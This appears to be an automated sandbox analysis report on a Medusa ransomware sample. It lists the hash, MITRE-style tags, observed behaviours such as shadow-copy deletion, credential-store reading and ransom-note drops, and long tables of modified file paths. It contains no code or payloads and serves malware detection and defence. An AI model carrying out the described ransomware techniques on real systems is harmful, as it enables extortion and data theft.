Malware Analysis Report

2024-12-07 17:08

Sample ID 241001-qm6f9a1gjk
Target 2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike
SHA256 6b807f9f7c8f24f436b0bab25cb38583bf4c051ea779fcdbb215af8a9a7f64de
Tags
medusaransomware credential_access defense_evasion discovery execution impact ransomware spyware stealer persistence
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

6b807f9f7c8f24f436b0bab25cb38583bf4c051ea779fcdbb215af8a9a7f64de

Threat Level: Known bad

The file 2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike was found to be: Known bad.

Malicious Activity Summary

medusaransomware credential_access defense_evasion discovery execution impact ransomware spyware stealer persistence

Medusa Ransomware

Renames multiple (8855) files with added filename extension

Deletes shadow copies

Renames multiple (8843) files with added filename extension

Boot or Logon Autostart Execution: Active Setup

Credentials from Password Stores: Windows Credential Manager

Reads user/profile data of web browsers

Drops startup file

Network Share Discovery

Enumerates connected drives

Drops desktop.ini file(s)

Drops file in Program Files directory

Browser Information Discovery

System Location Discovery: System Language Discovery

System Network Configuration Discovery: Internet Connection Discovery

Program crash

Unsigned PE

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Suspicious use of SendNotifyMessage

Suspicious use of FindShellTrayWindow

Modifies registry class

Uses Volume Shadow Copy service COM API

Runs net.exe

Interacts with shadow copies

Runs ping.exe

Kills process with taskkill

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-01 13:23

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-01 13:23

Reported

2024-10-01 13:26

Platform

win7-20240903-en

Max time kernel

34s

Max time network

16s

Command Line

"C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe"

Signatures

Medusa Ransomware

ransomware medusaransomware

Deletes shadow copies

ransomware defense_evasion impact execution

Renames multiple (8855) files with added filename extension

ransomware

Credentials from Password Stores: Windows Credential Manager

credential_access stealer

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\!!!READ_ME_MEDUSA!!!.txt C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\!!!READ_ME_MEDUSA!!!.txt C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\!!!READ_ME_MEDUSA!!!.txt C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\!!!READ_ME_MEDUSA!!!.txt C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A

Reads user/profile data of web browsers

spyware stealer

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\Users\Admin\Saved Games\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Admin\Videos\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Public\Downloads\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\GUJ7UW2N\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\GY8QW6M2\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\75GKCLJR\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Admin\Documents\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Public\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Public\Pictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\Microsoft Games\Mahjong\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\Microsoft Games\SpiderSolitaire\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Public\Pictures\Sample Pictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Public\Documents\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Public\Recorded TV\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\DataServices\DESKTOP.INI C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\History\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\$Recycle.Bin\S-1-5-21-1846800975-3917212583-2893086201-1000\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Admin\Links\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\Microsoft Games\FreeCell\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\Microsoft Games\Solitaire\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Admin\Desktop\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SendTo\Desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Admin\Favorites\Links\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\3W44XPEP\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\Y8O71085\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Admin\Favorites\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Admin\Searches\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\Microsoft Games\Purble Place\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games\Desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\L7XNHY48\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Public\Libraries\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification F:\$RECYCLE.BIN\S-1-5-21-1846800975-3917212583-2893086201-1000\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\Stationery\Desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Public\Music\Sample Music\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\Microsoft Games\Chess\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows Mail\Stationery\Desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Admin\Downloads\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Public\Recorded TV\Sample Media\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\F: C:\Windows\SysWOW64\vssadmin.exe N/A
File opened (read-only) \??\F: C:\Windows\SysWOW64\vssadmin.exe N/A

Network Share Discovery

discovery

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\hwruksh.dat C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Pangnirtung C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\CANYON\!!!READ_ME_MEDUSA!!!.txt C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Melbourne C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18187_.WMF C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\BabyBlue\!!!READ_ME_MEDUSA!!!.txt C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\GrayCheck\TAB_OFF.GIF C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File created C:\Program Files\Common Files\Microsoft Shared\ink\sk-SK\!!!READ_ME_MEDUSA!!!.txt C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_gray_cloudy.png C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SY01462_.WMF C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\Windows NT\Accessories\it-IT\!!!READ_ME_MEDUSA!!!.txt C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\MSPTLS.DLL C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\en-US\gadget.xml C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0149407.WMF C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\RECS.ICO C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File created C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\en-US\js\!!!READ_ME_MEDUSA!!!.txt C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\APPT.CFG C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Americana\TAB_ON.GIF C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\Resource.zip C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\it-IT\TipBand.dll.mui C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\feature.xml C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\ARCTIC\PREVIEW.GIF C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\HH01013_.WMF C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\VIEW.JS C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0187829.WMF C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Desert\TAB_OFF.GIF C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\QuestionIconMask.bmp C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\ja-JP\tipresx.dll.mui C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Postage_SelectionSubpicture.png C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\about.html C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01236U.BMP C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\Publisher\Backgrounds\WB02106_.GIF C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ql.nl_ja_4.4.0.v20140623020002.jar C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\Windows Photo Viewer\es-ES\PhotoViewer.dll.mui C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\120DPI\(120DPI)grayStateIcon.png C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\VIEW.JS C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File created C:\Program Files\Reference Assemblies\Microsoft\!!!READ_ME_MEDUSA!!!.txt C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\dialogs\stream_config_window.html C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\images\reveal_rest.png C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Templates\1033\AdjacencyResume.dotx C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Windows NT\TableTextService\de-DE\TableTextService.dll.mui C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\Common Files\System\ado\ja-JP\!!!READ_ME_MEDUSA!!!.txt C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14985_.GIF C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\J0115844.GIF C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File created C:\Program Files\VideoLAN\VLC\locale\tr\LC_MESSAGES\!!!READ_ME_MEDUSA!!!.txt C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21480_.GIF C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\HueCycle\colorcycle.png C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Templates\1033\Access\Part\Tasks.accdt C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
